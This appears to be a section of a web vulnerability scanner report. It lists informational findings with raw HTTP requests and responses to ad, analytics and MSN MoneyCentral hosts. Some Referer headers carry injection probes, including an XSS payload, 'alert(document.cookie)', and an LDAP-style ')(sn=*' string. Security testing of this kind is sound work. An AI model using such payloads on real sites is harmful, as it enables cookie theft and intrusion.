32.7. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3973.MSN/B4412732.159

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

32.8. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.MSNMEN/B3889285.6

Request

Response

32.9. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.383

Request

Response

32.10. http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4441.microsoftonline/B5073082

Request

Response

32.11. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

32.12. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

32.13. http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/tigerdirect.com/Section_2_House

Request

Response

32.14. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test_cookie=CheckForPermission;

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sat, 29 Jan 2011 23:45:09 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

32.15. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d775684/10/38973908/decide.php

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:48:34 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a227.dl
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 14:48:33 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 06:48:34 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-`bzsM-0; expires=Thu, 22-Mar-2012 06:48:34 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 1
Content-Type: text/html

;

32.16. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Request

GET /adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=5845715 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:27:29 GMT
Server: Apache
DL_S: a211
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 164
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php?ord="+Math.floor((new Date()).getTime()/1000);

}
})();

32.17. http://analytics.live.com/Sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.live.com
Path:	/Sync.html

Request

Response

32.18. http://analytics.microsoft.com/Sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.microsoft.com
Path:	/Sync.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:a15"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:50:53 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...

32.19. http://analytics.redacted/Include.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.redacted
Path:	/Include.html

Request

Response

32.20. http://analytics.redacted/sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.redacted
Path:	/sync.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:9ed"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 13:00:12 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...

32.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Connection: close
Content-Length: 2204

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

32.22. http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.pulse360.com
Path:	/42EBFC62-1F4E-11E0-AB70-41F5E4064C68

Request

GET /42EBFC62-1F4E-11E0-AB70-41F5E4064C68 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:39 GMT
Server: Barista/1.1-(eanibm)
Connection: Close
Content-Length: 7634
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css"> div#p360-hybrid300x250slateplain-42EBFC62-1F4E-11E0-AB70-41F5E4064C68 { width: 300px; left: 0; font-family: sans-serif; position: relative; displa
...[SNIP]...

32.23. http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.pulse360.com
Path:	/517F9430-C0FA-11DF-831B-94A93FF5047F

Request

GET /517F9430-C0FA-11DF-831B-94A93FF5047F HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:40 GMT
Server: Barista/1.1-(eanlbh)
Connection: Close
Content-Length: 5210
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: fc_ms_1.3=EA; domain=.pulse360.com; path=/; expires=Sun, 06-Feb-2011 01:19:40 GMT

document.write('<style type="text/css"> div#p360-SL660x75msnbc-517F9430-C0FA-11DF-831B-94A93FF5047F { width: 660px; left: 0; font-family: sans-serif; position: relative; float: none;
...[SNIP]...

32.24. http://context3.kanoodle.com/cgi-bin/context.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://context3.kanoodle.com
Path:	/cgi-bin/context.cgi

Request

GET /cgi-bin/context.cgi?id=1000&db=context&query=*general_network:premium&cgroup=d_usnews&format=standard&numresults=5&linkcolor=003399&titlecolor=003399&fontsize=11&textcolor=666666 HTTP/1.1
Host: context3.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/search_spy.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:31 GMT
Server: Barista/1.1-(eanhbn)
Connection: Close
Content-Length: 3946
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css">.listing { background-color: #FFFFFF; font-size: 11px; font-family: ; width: 100%; border: 1px solid #FFFFFF; padding-left: 5px; }.listing_title {
...[SNIP]...

32.25. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1860849269@x23

Request

Response

32.26. http://ec.redcated/ds/UXULASONYSEL/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ec.redcated
Path:	/ds/UXULASONYSEL/

Request

GET /ds/UXULASONYSEL/ HTTP/1.1
Host: ec.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 400 Bad Request
Date: Sun, 30 Jan 2011 02:08:12 GMT
Content-Type: text/html
Content-Length: 15
Allow: GET
Connection: close

<html>
</html>

32.27. http://english.aljazeera.net/_inc/adsrc.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://english.aljazeera.net
Path:	/_inc/adsrc.html

Request

Response

32.28. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://english.aljazeera.net
Path:	/news/middleeast/2011/01/201113085252994161.html

Request

Response

32.29. http://geo.eyewonder.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://geo.eyewonder.com
Path:	/

Request

GET /?ddata=country HTTP/1.1
Host: geo.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://cdn.eyewonder.com/100125/767752/1419198/300x250_shell.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; ewroi=""

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 120
Expires: Sun, 30 Jan 2011 17:59:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:59:53 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="UTF-8"?>
<geoInfo clientIP="173.193.214.243">
<country>US</country>
</geoInfo>

32.30. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.31. http://local.redacted/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/ten-day.aspx

Request

GET /ten-day.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:47:51 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

32.32. http://local.redacted/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/weather.aspx

Request

GET /weather.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:47:41 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

32.33. http://redacted/inc/Attributions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/inc/Attributions.asp

Request

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.34. http://redacted/inc/Views/Shared/Core/Content/js/utility.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/utility.js

Request

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:53:16 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

32.35. http://redacted/investor/StockRating/srsmain.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/StockRating/srsmain.asp

Request

Response

32.36. http://redacted/investor/home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/home.aspx

Request

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 16:51:21 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

32.37. http://redacted/investor/market/earncalendar/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/market/earncalendar/

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 19872
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:26 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

32.38. http://redacted/investor/market/treasuries.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/market/treasuries.aspx

Request

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:47 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

32.39. http://redacted/investor/partsub/funds/etfperformancetracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Request

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:12:39 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

32.40. http://redacted/investor/partsub/funds/topfunds.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/topfunds.asp

Request

Response

32.41. http://redacted/investor/quotewatchlist.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/quotewatchlist.asp

Request

Response

32.42. http://msn.whitepages.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.whitepages.com
Path:	/

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=A06546_10827|H05525_10833; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; __qca=P0-1307497695-1296350983104;

Response

HTTP/1.1 403 Forbidden
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Vary: Accept-Encoding
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:02 GMT
Connection: close
Content-Length: 1054

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!WhitePages.com - Seattle, WA>
<meta http-equiv="Pragma" content="no-cache">
<html>
<head>
<title>WhitePages.com, Inc. Data Maintenanc
...[SNIP]...

32.43. http://mymsn.hotmail.redacted/cgi-bin/mymsn/mymsn.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mymsn.hotmail.msn.com
Path:	/cgi-bin/mymsn/mymsn.html

Request

GET /cgi-bin/mymsn/mymsn.html HTTP/1.1
Host: mymsn.hotmail.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:50:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Set-Cookie: MyMsn=1; domain=.redacted; path=/
Content-Length: 191
Cache-Control: private
Content-Type: text/html
HMServer: H: BAY142-F35.phx.gbl V: WIN2K3 10.31.0000.0101 i D: Dec 7 2007 15:33:41 S: 0

<html><head><title>MyMsn.html</title></head><body>MyMsn.html</body></html>

32.44. http://player.ooyala.com/info/primary/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/info/primary/

Request

GET /info/primary/ HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
